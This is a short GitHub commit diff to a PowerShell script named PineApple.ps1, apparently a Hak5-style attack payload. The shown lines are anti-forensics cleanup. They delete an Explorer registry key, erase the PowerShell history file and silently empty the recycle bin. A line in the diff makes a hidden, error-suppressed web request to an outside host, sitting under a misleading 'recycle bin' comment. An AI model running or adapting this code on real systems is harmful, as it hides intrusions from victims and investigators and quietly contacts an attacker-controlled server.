Update PineApple.ps1

This commit is contained in:
I-Am-Jakoby
2023-06-10 15:22:28 -05:00
committed by GitHub
parent 42c8b51f96
commit 632c5729b7
+1 -1
View File
@@ -48,5 +48,5 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
iwr "https://jakoby.lol/hak5" -EA 0 >$null
Clear-RecycleBin -Force -ErrorAction SilentlyContinue